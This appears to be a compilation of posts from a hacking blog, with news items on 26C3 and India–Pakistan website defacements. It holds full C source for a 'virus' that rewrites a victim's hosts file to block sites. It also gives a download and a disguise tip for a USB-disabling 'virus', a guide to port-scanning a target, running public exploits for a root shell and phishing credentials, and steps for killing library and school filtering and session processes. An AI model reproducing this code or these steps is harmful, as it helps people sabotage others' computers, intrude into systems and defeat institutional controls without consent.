%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

A Virus Program to Block Websites

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.

How to Compile C Programs



How to Compile C Programs

In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.
 

How to install Borland C++ compiler

 
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
 

How to configure Borland C++ compiler

 
1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I”c:\Borland\Bcc55\include” -L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
 

How to compile the C source code (.C files)

 
1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
Command to Compile C Program
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file).

A Virus Program to Disable USB Ports

A Virus Program to Disable USB Ports

Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer

http://www.mediafire.com/?syb98wqnfe255bk.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program.
I hope you like this post. Please pass your comments.

World's Largest Annual Hacker Conference, 26C3, Took place in Berlin last week

The 26th edition of the world's largest annual hacker conference, 26C3, took place in Berlin last week. With about 2,500 attendees, a combined total of 9,000 participants worldwide (via live streams), and an array of features that no other conference in the world can match, it was very much a milestone.

A bit on the word "hacker", as I know the term might be bothering some of you. A HACKER: one who tinkers, one who deconstructs out of a natural curiosity about how something works and how it could be made to do something it wasn't originally intended to do. Such abilities are akin to the skilled locksmith, and do not automatically make a hacker a criminal. Unfortunately for many who work in mainstream media, the word has been hijacked to be synonymous with "electronic evildoer". Yet, like many words that have been used to keep minority groups down, hackers are taking the label back.

Announcements such as the GSM encryption crack may have made international headlines last month, but something much more significant is clear: throughout the world, hackers have come out from their bunkers and opened up community spaces. They go by various names (co-working spaces, clubhouses, hideouts, space stations) and are a global-scale breakthrough for a community that for decades has not always been willing or able to go public. By opening up, they've not only gone public, but have also opened their doors to anyone curious or interested in the world of technology and how things work.

This phenomenon may be bigger than it has ever been, but in some corners of the world, it is not altogether new. Groups of German hackers have long organised themselves as officially recognised clubs and taken on challenges of a technical (or non-technical) nature. In North America, the movement has seen its greatest expansion in the past few years, with spaces such as NYC Resistor in Brooklyn, Pumping Station: One in Chicago and Noisebridge in San Francisco providing a creative space for a rapidly growing membership. The hacker space movement includes clubs in different parts of Latin America, as well as in South Africa, Israel, Iran, Dubai, Thailand, Malaysia, Singapore, Indonesia, Japan and Australia. Every month, the list gets longer as more groups come forward and post their details online at hackerspaces.org, a central hub and wiki for all info about spaces, including how to start one.

Among the attendees at the 26C3 conference were the people behind wikileaks, the wiki clearinghouse for leaked documents. In its first few years wikileaks has come under attack by governments and other large institutions who fear its growing influence and has made international headlines on several occasions, including when it was ordered to shut down by a California court in 2008 after documents were leaked related to offshore bank activities. Presenting at this year's congress, their goal was to explain how this project could become an essential tool for journalists throughout the world who seek sources and secure methods to protect the identity of those with access to – and brave enough to leak – sensitive information.

Also present was Bre Pettis and his Makerbot Industries. The knob on your dishwasher broke off? Trying in vain to contact customer assistance and find some way to get a replacement part? Well Pettis had a better idea, and by using a 3D printer, produced his own replacement knob. His tinkering with 3D printing has resulted in the founding of his very own company, Makerbot, which has actual employees and its own manufacturing space in Brooklyn, shipping Makerbots all over the world. Pettis didn't tell us to buy his stuff, but talked about what other people have been building and how he envisages a future where people aren't just consumers: he dreams of a return of the tradition of people making things.

It is hard not to be in awe of what this group of hackers was able to build for a four-day conference: its GSM network, an internal Dect phone system, a radio station, its own all-volunteer first aid and emergency rescue team and an indescribably fast network with capacity that no conference or municipality in the world can compete with. It is no wonder spaces are popping up everywhere, as hackers come out of the cupboards and stand proudly as the talented explorers and critical thinkers that they are.

Why was Vijay Mallya hacked?

While you were enjoying the Independence Day spirit and probably flying kites, an all out war was on between India and Pakistan.

Fortunately, it was not on the border but in cyberspace where hackers from the two countries were engaged in pitched battles to outdo each other.

According to cyber experts, more than a thousand websites were hacked into and defaced on August 14 and 15 when Pakistan and India celebrated their Independence respectively. The Day came as a nightmare for some of the webmasters website owners from the two nations. Pakistani hackers were first to strike on August 14 when they defaced Indian websites. The Indian side returned fire the following day.

Hackers from both the nations hacked the websites and posted flags of the respective countries on the targeted websites.

Two Pakistani groups Pak Cyber Army and PakHaxors started the attack. As per zone-h data, these groups have defaced around 10-20 websites. The counter attack from the Indian side was led by Indishell and Indian Cyber Army who claim to have defaced 1,226 Pakistani websites. Zone-h data confirms the figure is more than 1,000 website.

In retaliation the Pakistani hackers intensified the volume and nature of the attack resulting in the hacking of the website of UB group chairman and Rajya Sabha MP Vijay Mallya.

"This is a payback from Pak Cyber Army in return to the defacements of Pakistani sites! You are playing with fire!, This is not a game kids. We are warning you one last time, don't think that you are secure in this Cyber Space. We will turn your Cyber Space into Hell," the hacked site read.

A number of websites are hacked but most go unreported. There will be many Indian and Pakistani groups who are involved in this but the Indian side is mainly represented by ICW (Indian cyber warriors), ICA (Indian Cyber Army) and HMG (Hindu Militant Group) and Indishell. PCA (Pakistan Cyber Army), Pakbugs and Pakhaxors lead the Pakistani side.

Friday, August 27, 2010

Hack with ip address






Hack with ip address:


So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this ******** ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network. 

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie <Domain Name> (192.150.13.111:80); Cl***: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown


In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running. 



2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer **** dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some **** at the very top of the screen. You may think, well what the hell, how is that little string of **** going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25. 





220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400


Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. 


There are some instances in which companies will try and falsify their headers/banners so ******* are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. 

This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. 

Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the ****lcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. 


That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. 




Now that you have a command ****l in front of you, you can start doing whatever you want, delete everything if you want to be a ****ing jerk, however I dont recommend that. Maybe leave a **** file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. 


Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called ****lcode in hex. This ****lcode is what returns that command prompt when you run the exploit. 


That wasnt the best de******ion of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter  

http://www.bank.com and his connection will be redirected to your site where you can make a username and p***word box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com

You need to have a small ****** set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.
__________________________________________________ _______o_________

So as a summary of how to 0Wn a box when you only have an IP Address
Method Works On BOTH *Nix and Windoze

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports




3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the ********ation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The Victim.
- Reap The Cheap-Sh0t Ownage
__________________________________________________ _______________
**This ******** does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**


HACKING LIBRARY OR SCHOOL OR COLLEGE.

HACKING LIBRARY OR SCHOOL OR COLLEGE.
here i am goin to show you how to hack a library and school..


Firstly wen you go into your local library and logonto a computer they usually give you 20-60 mins logging time... wel not know more firstly go to your desktop once logged into and create a new notepad file no WORDPAD.. and type in .........command
command.com



saves this as (anything).bat then open it this should run CMD/Command prompt
then type in color b (this makes it look better lol)
press enter..

type in tasklist...press enter


this should bring up the processes running on the computer..
look for the one you thing is to computers logon the are usually name NETsomething.exe look next to it there should be 4 numbers these are the processes PID's/Process ID ...
then type in taskkill -PID (the 4 numbers) press enter this should stop the process then you should get aslong as you want ... this can be used to stop filtering and other things PM me for other [tuts on this]...



SCHOOL or COLLEGE

has your school got really good filtering and blocking software or doesnt it ??
well if it does heres the way to stopp this..
there are too easy ways to do this one is to get a USB/PEN DRIVE and make a new batch file the command must be net stop (the .exe file ran) say for netsupport it would bee..... net stop client32.exe
save this on the usb and open it on the admins comp.. there are many other easy ways using RAT'S and stuff but this is for basic hackers.
or another way is to get a adminspass search for tuts on that .

heres a good hack if you schools comps have SHIT filtering and webblocking software and runs on XP
go onto calculator and got to the icon in the left hand corner and click it then go to jump to URL and type in your web page you want . this wil open the HTML page through the calculator good hack only for NOOBS there are other ways using command lines and batch file pm for that tut.